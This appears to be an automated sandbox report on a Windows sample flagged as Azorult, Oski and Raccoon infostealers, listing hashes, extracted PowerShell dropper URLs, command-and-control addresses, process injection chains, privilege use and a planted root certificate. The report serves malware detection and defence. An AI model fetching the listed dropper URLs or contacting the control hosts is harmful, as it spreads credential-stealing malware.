azorult | bd3cefcbb135df48caee6888747542a304c4706e24e93492c481201c556bf334

Analysis

max time kernel
142s
max time network
182s
platform
windows7_x64
resource
win7v20210408
submitted
02-09-2021 18:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BD3CEFCBB135DF48CAEE6888747542A304C4706E24E93.exe
Size

68KB
MD5

468832921f562702e1c628d7778a776b
SHA1

2501d72b98b8778858c3aad60a422f19fb423908
SHA256

bd3cefcbb135df48caee6888747542a304c4706e24e93492c481201c556bf334
SHA512

3c10dcc763e80df8db72d304769dcc66153dd2ee4916e8eebb12d88b89c16d73f8f8bc618fe4f312ac6e3c56ffb28be0d192bf6c1242c64b56dd7cdc361c2797

Score

10^/10

azorult oski raccoon 43aae292cfe6f58a13bd7111bdd7d5ded5b23ec3 discovery infostealer spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://bit.do/eVtV2

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://dgdfasddfs.ru/pps.ps1

Extracted

Family

raccoon

Botnet

43aae292cfe6f58a13bd7111bdd7d5ded5b23ec3

Attributes

url4cnc
https://telete.in/brikitiki

rc4.plain

Extracted

Family

oski

mazooyaar.ac.ug

Extracted

Family

azorult

http://195.245.112.115/index.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Oski
Oski is an infostealer targeting browser data, crypto wallets.
infostealer oski
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

8 1960 powershell.exe
9 1728 powershell.exe
Downloads MZ/PE file

flow	pid	process
8	1960	powershell.exe
9	1728	powershell.exe

Executes dropped EXE 19 IoCs

Processes:

UNGActivator.exetjso.exetjso.exebvasdvdfsds.exedfgdvdfsds.execvbfsds.exebvcfsds.exevcxfse.execbvjns.execbvjns.execvbfsds.exevcxfse.exebvasdvdfsds.exedfgdvdfsds.exeOggnfkemtibcinconsoleapp16.exeOggnfkemtibcinconsoleapp16.exeHsbvhggsqlrfmuvyptooonsoleapp5.exeHsbvhggsqlrfmuvyptooonsoleapp5.exeHsbvhggsqlrfmuvyptooonsoleapp5.exe

pid	process
1724	UNGActivator.exe
1684	tjso.exe
1720	tjso.exe
792	bvasdvdfsds.exe
488	dfgdvdfsds.exe
1004	cvbfsds.exe
520	bvcfsds.exe
1980	vcxfse.exe
1732	cbvjns.exe
684	cbvjns.exe
1888	cvbfsds.exe
1792	vcxfse.exe
2984	bvasdvdfsds.exe
3032	dfgdvdfsds.exe
2040	Oggnfkemtibcinconsoleapp16.exe
1756	Oggnfkemtibcinconsoleapp16.exe
900	Hsbvhggsqlrfmuvyptooonsoleapp5.exe
3064	Hsbvhggsqlrfmuvyptooonsoleapp5.exe
1480	Hsbvhggsqlrfmuvyptooonsoleapp5.exe

Loads dropped DLL 36 IoCs

Processes:

cmd.exepowershell.exetjso.execvbfsds.execbvjns.exevcxfse.exevcxfse.execvbfsds.exebvasdvdfsds.exedfgdvdfsds.exeWScript.exeOggnfkemtibcinconsoleapp16.exeWScript.exeHsbvhggsqlrfmuvyptooonsoleapp5.exe

pid	process
1352	cmd.exe
1728	powershell.exe
1728	powershell.exe
1720	tjso.exe
1720	tjso.exe
1720	tjso.exe
1720	tjso.exe
1720	tjso.exe
1720	tjso.exe
1004	cvbfsds.exe
1004	cvbfsds.exe
1004	cvbfsds.exe
1004	cvbfsds.exe
1004	cvbfsds.exe
1732	cbvjns.exe
1980	vcxfse.exe
1792	vcxfse.exe
1792	vcxfse.exe
1792	vcxfse.exe
1792	vcxfse.exe
1792	vcxfse.exe
1888	cvbfsds.exe
1888	cvbfsds.exe
1888	cvbfsds.exe
1888	cvbfsds.exe
1888	cvbfsds.exe
1888	cvbfsds.exe
1888	cvbfsds.exe
1888	cvbfsds.exe
792	bvasdvdfsds.exe
488	dfgdvdfsds.exe
2964	WScript.exe
2040	Oggnfkemtibcinconsoleapp16.exe
1180	WScript.exe
900	Hsbvhggsqlrfmuvyptooonsoleapp5.exe
900	Hsbvhggsqlrfmuvyptooonsoleapp5.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 38 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

tjso.exe

pid process

1720 tjso.exe
1720 tjso.exe

pid	process
1720	tjso.exe
1720	tjso.exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

tjso.execvbfsds.execbvjns.exevcxfse.exebvasdvdfsds.exedfgdvdfsds.exeOggnfkemtibcinconsoleapp16.exeHsbvhggsqlrfmuvyptooonsoleapp5.exe

description	pid	process	target process
PID 1684 set thread context of 1720	1684	tjso.exe	tjso.exe
PID 1004 set thread context of 1888	1004	cvbfsds.exe	cvbfsds.exe
PID 1732 set thread context of 684	1732	cbvjns.exe	cbvjns.exe
PID 1980 set thread context of 1792	1980	vcxfse.exe	vcxfse.exe
PID 792 set thread context of 2984	792	bvasdvdfsds.exe	bvasdvdfsds.exe
PID 488 set thread context of 3032	488	dfgdvdfsds.exe	dfgdvdfsds.exe
PID 2040 set thread context of 1756	2040	Oggnfkemtibcinconsoleapp16.exe	Oggnfkemtibcinconsoleapp16.exe
PID 900 set thread context of 1480	900	Hsbvhggsqlrfmuvyptooonsoleapp5.exe	Hsbvhggsqlrfmuvyptooonsoleapp5.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Checks processor information in registry 2 TTPs 1 IoCs
Processor information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

vcxfse.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString vcxfse.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2708 timeout.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1560 taskkill.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	vcxfse.exe

pid	process
2708	timeout.exe

pid	process
1560	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

cvbfsds.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	cvbfsds.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	cvbfsds.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exebvasdvdfsds.exedfgdvdfsds.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeOggnfkemtibcinconsoleapp16.exe

pid	process
1728	powershell.exe
1960	powershell.exe
1728	powershell.exe
1488	powershell.exe
1488	powershell.exe
1728	powershell.exe
1772	powershell.exe
348	powershell.exe
348	powershell.exe
1772	powershell.exe
1556	powershell.exe
280	powershell.exe
280	powershell.exe
1556	powershell.exe
2028	powershell.exe
2028	powershell.exe
1376	powershell.exe
1992	powershell.exe
1376	powershell.exe
1992	powershell.exe
2060	powershell.exe
2096	powershell.exe
2096	powershell.exe
2060	powershell.exe
2260	powershell.exe
2228	powershell.exe
2260	powershell.exe
2228	powershell.exe
2408	powershell.exe
2440	powershell.exe
2440	powershell.exe
2408	powershell.exe
2584	powershell.exe
2584	powershell.exe
2708	powershell.exe
2708	powershell.exe
2828	powershell.exe
2828	powershell.exe
792	bvasdvdfsds.exe
792	bvasdvdfsds.exe
488	dfgdvdfsds.exe
488	dfgdvdfsds.exe
676	powershell.exe
676	powershell.exe
2220	powershell.exe
2220	powershell.exe
2280	powershell.exe
2280	powershell.exe
2420	powershell.exe
2420	powershell.exe
2560	powershell.exe
2560	powershell.exe
2480	powershell.exe
2480	powershell.exe
2716	powershell.exe
2716	powershell.exe
1956	powershell.exe
1956	powershell.exe
2884	powershell.exe
2884	powershell.exe
2728	powershell.exe
2728	powershell.exe
2040	Oggnfkemtibcinconsoleapp16.exe
2040	Oggnfkemtibcinconsoleapp16.exe

Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

tjso.execvbfsds.execbvjns.exevcxfse.exe

pid process

1684 tjso.exe
1004 cvbfsds.exe
1732 cbvjns.exe
1980 vcxfse.exe

pid	process
1684	tjso.exe
1004	cvbfsds.exe
1732	cbvjns.exe
1980	vcxfse.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exetaskkill.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exebvasdvdfsds.exepowershell.exedfgdvdfsds.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1728	powershell.exe
Token: SeDebugPrivilege	1960	powershell.exe
Token: SeDebugPrivilege	1560	taskkill.exe
Token: SeDebugPrivilege	1728	powershell.exe
Token: SeDebugPrivilege	1488	powershell.exe
Token: SeDebugPrivilege	1772	powershell.exe
Token: SeDebugPrivilege	348	powershell.exe
Token: SeDebugPrivilege	1556	powershell.exe
Token: SeDebugPrivilege	280	powershell.exe
Token: SeDebugPrivilege	2028	powershell.exe
Token: SeDebugPrivilege	1376	powershell.exe
Token: SeDebugPrivilege	1992	powershell.exe
Token: SeDebugPrivilege	2060	powershell.exe
Token: SeDebugPrivilege	2096	powershell.exe
Token: SeDebugPrivilege	2260	powershell.exe
Token: SeDebugPrivilege	2228	powershell.exe
Token: SeDebugPrivilege	2408	powershell.exe
Token: SeDebugPrivilege	2440	powershell.exe
Token: SeDebugPrivilege	2584	powershell.exe
Token: SeDebugPrivilege	2708	powershell.exe
Token: SeDebugPrivilege	792	bvasdvdfsds.exe
Token: SeDebugPrivilege	2828	powershell.exe
Token: SeDebugPrivilege	488	dfgdvdfsds.exe
Token: SeDebugPrivilege	676	powershell.exe
Token: SeDebugPrivilege	2220	powershell.exe
Token: SeDebugPrivilege	2280	powershell.exe
Token: SeDebugPrivilege	2420	powershell.exe
Token: SeDebugPrivilege	2560	powershell.exe
Token: SeDebugPrivilege	2480	powershell.exe
Token: SeIncreaseQuotaPrivilege	2480	powershell.exe
Token: SeSecurityPrivilege	2480	powershell.exe
Token: SeTakeOwnershipPrivilege	2480	powershell.exe
Token: SeLoadDriverPrivilege	2480	powershell.exe
Token: SeSystemProfilePrivilege	2480	powershell.exe
Token: SeSystemtimePrivilege	2480	powershell.exe
Token: SeProfSingleProcessPrivilege	2480	powershell.exe
Token: SeIncBasePriorityPrivilege	2480	powershell.exe
Token: SeCreatePagefilePrivilege	2480	powershell.exe
Token: SeBackupPrivilege	2480	powershell.exe
Token: SeRestorePrivilege	2480	powershell.exe
Token: SeShutdownPrivilege	2480	powershell.exe
Token: SeDebugPrivilege	2480	powershell.exe
Token: SeSystemEnvironmentPrivilege	2480	powershell.exe
Token: SeRemoteShutdownPrivilege	2480	powershell.exe
Token: SeUndockPrivilege	2480	powershell.exe
Token: SeManageVolumePrivilege	2480	powershell.exe
Token: 33	2480	powershell.exe
Token: 34	2480	powershell.exe
Token: 35	2480	powershell.exe
Token: SeIncreaseQuotaPrivilege	2480	powershell.exe
Token: SeSecurityPrivilege	2480	powershell.exe
Token: SeTakeOwnershipPrivilege	2480	powershell.exe
Token: SeLoadDriverPrivilege	2480	powershell.exe
Token: SeSystemProfilePrivilege	2480	powershell.exe
Token: SeSystemtimePrivilege	2480	powershell.exe
Token: SeProfSingleProcessPrivilege	2480	powershell.exe
Token: SeIncBasePriorityPrivilege	2480	powershell.exe
Token: SeCreatePagefilePrivilege	2480	powershell.exe
Token: SeBackupPrivilege	2480	powershell.exe
Token: SeRestorePrivilege	2480	powershell.exe
Token: SeShutdownPrivilege	2480	powershell.exe
Token: SeDebugPrivilege	2480	powershell.exe
Token: SeSystemEnvironmentPrivilege	2480	powershell.exe
Token: SeRemoteShutdownPrivilege	2480	powershell.exe

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

tjso.exetjso.execvbfsds.exebvcfsds.exevcxfse.execbvjns.exe

pid process

1684 tjso.exe
1720 tjso.exe
1004 cvbfsds.exe
520 bvcfsds.exe
1980 vcxfse.exe
1732 cbvjns.exe

pid	process
1684	tjso.exe
1720	tjso.exe
1004	cvbfsds.exe
520	bvcfsds.exe
1980	vcxfse.exe
1732	cbvjns.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

BD3CEFCBB135DF48CAEE6888747542A304C4706E24E93.execmd.exepowershell.exetjso.exetjso.execvbfsds.execbvjns.exevcxfse.exe

description	pid	process	target process
PID 1932 wrote to memory of 1352	1932	BD3CEFCBB135DF48CAEE6888747542A304C4706E24E93.exe	cmd.exe
PID 1932 wrote to memory of 1352	1932	BD3CEFCBB135DF48CAEE6888747542A304C4706E24E93.exe	cmd.exe
PID 1932 wrote to memory of 1352	1932	BD3CEFCBB135DF48CAEE6888747542A304C4706E24E93.exe	cmd.exe
PID 1932 wrote to memory of 1352	1932	BD3CEFCBB135DF48CAEE6888747542A304C4706E24E93.exe	cmd.exe
PID 1352 wrote to memory of 1960	1352	cmd.exe	powershell.exe
PID 1352 wrote to memory of 1960	1352	cmd.exe	powershell.exe
PID 1352 wrote to memory of 1960	1352	cmd.exe	powershell.exe
PID 1352 wrote to memory of 1960	1352	cmd.exe	powershell.exe
PID 1352 wrote to memory of 1728	1352	cmd.exe	powershell.exe
PID 1352 wrote to memory of 1728	1352	cmd.exe	powershell.exe
PID 1352 wrote to memory of 1728	1352	cmd.exe	powershell.exe
PID 1352 wrote to memory of 1728	1352	cmd.exe	powershell.exe
PID 1352 wrote to memory of 1724	1352	cmd.exe	UNGActivator.exe
PID 1352 wrote to memory of 1724	1352	cmd.exe	UNGActivator.exe
PID 1352 wrote to memory of 1724	1352	cmd.exe	UNGActivator.exe
PID 1352 wrote to memory of 1724	1352	cmd.exe	UNGActivator.exe
PID 1728 wrote to memory of 1684	1728	powershell.exe	tjso.exe
PID 1728 wrote to memory of 1684	1728	powershell.exe	tjso.exe
PID 1728 wrote to memory of 1684	1728	powershell.exe	tjso.exe
PID 1728 wrote to memory of 1684	1728	powershell.exe	tjso.exe
PID 1684 wrote to memory of 1720	1684	tjso.exe	tjso.exe
PID 1684 wrote to memory of 1720	1684	tjso.exe	tjso.exe
PID 1684 wrote to memory of 1720	1684	tjso.exe	tjso.exe
PID 1684 wrote to memory of 1720	1684	tjso.exe	tjso.exe
PID 1684 wrote to memory of 1720	1684	tjso.exe	tjso.exe
PID 1720 wrote to memory of 792	1720	tjso.exe	bvasdvdfsds.exe
PID 1720 wrote to memory of 792	1720	tjso.exe	bvasdvdfsds.exe
PID 1720 wrote to memory of 792	1720	tjso.exe	bvasdvdfsds.exe
PID 1720 wrote to memory of 792	1720	tjso.exe	bvasdvdfsds.exe
PID 1720 wrote to memory of 488	1720	tjso.exe	dfgdvdfsds.exe
PID 1720 wrote to memory of 488	1720	tjso.exe	dfgdvdfsds.exe
PID 1720 wrote to memory of 488	1720	tjso.exe	dfgdvdfsds.exe
PID 1720 wrote to memory of 488	1720	tjso.exe	dfgdvdfsds.exe
PID 1720 wrote to memory of 1004	1720	tjso.exe	cvbfsds.exe
PID 1720 wrote to memory of 1004	1720	tjso.exe	cvbfsds.exe
PID 1720 wrote to memory of 1004	1720	tjso.exe	cvbfsds.exe
PID 1720 wrote to memory of 1004	1720	tjso.exe	cvbfsds.exe
PID 1720 wrote to memory of 520	1720	tjso.exe	bvcfsds.exe
PID 1720 wrote to memory of 520	1720	tjso.exe	bvcfsds.exe
PID 1720 wrote to memory of 520	1720	tjso.exe	bvcfsds.exe
PID 1720 wrote to memory of 520	1720	tjso.exe	bvcfsds.exe
PID 1004 wrote to memory of 1980	1004	cvbfsds.exe	vcxfse.exe
PID 1004 wrote to memory of 1980	1004	cvbfsds.exe	vcxfse.exe
PID 1004 wrote to memory of 1980	1004	cvbfsds.exe	vcxfse.exe
PID 1004 wrote to memory of 1980	1004	cvbfsds.exe	vcxfse.exe
PID 1004 wrote to memory of 1732	1004	cvbfsds.exe	cbvjns.exe
PID 1004 wrote to memory of 1732	1004	cvbfsds.exe	cbvjns.exe
PID 1004 wrote to memory of 1732	1004	cvbfsds.exe	cbvjns.exe
PID 1004 wrote to memory of 1732	1004	cvbfsds.exe	cbvjns.exe
PID 1004 wrote to memory of 1888	1004	cvbfsds.exe	cvbfsds.exe
PID 1004 wrote to memory of 1888	1004	cvbfsds.exe	cvbfsds.exe
PID 1004 wrote to memory of 1888	1004	cvbfsds.exe	cvbfsds.exe
PID 1004 wrote to memory of 1888	1004	cvbfsds.exe	cvbfsds.exe
PID 1004 wrote to memory of 1888	1004	cvbfsds.exe	cvbfsds.exe
PID 1732 wrote to memory of 684	1732	cbvjns.exe	cbvjns.exe
PID 1732 wrote to memory of 684	1732	cbvjns.exe	cbvjns.exe
PID 1732 wrote to memory of 684	1732	cbvjns.exe	cbvjns.exe
PID 1732 wrote to memory of 684	1732	cbvjns.exe	cbvjns.exe
PID 1732 wrote to memory of 684	1732	cbvjns.exe	cbvjns.exe
PID 1980 wrote to memory of 1792	1980	vcxfse.exe	vcxfse.exe
PID 1980 wrote to memory of 1792	1980	vcxfse.exe	vcxfse.exe
PID 1980 wrote to memory of 1792	1980	vcxfse.exe	vcxfse.exe
PID 1980 wrote to memory of 1792	1980	vcxfse.exe	vcxfse.exe
PID 1980 wrote to memory of 1792	1980	vcxfse.exe	vcxfse.exe

C:\Users\Admin\AppData\Local\Temp\BD3CEFCBB135DF48CAEE6888747542A304C4706E24E93.exe
"C:\Users\Admin\AppData\Local\Temp\BD3CEFCBB135DF48CAEE6888747542A304C4706E24E93.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1932

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\C0FE.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\BD3CEFCBB135DF48CAEE6888747542A304C4706E24E93.exe"
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1352

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
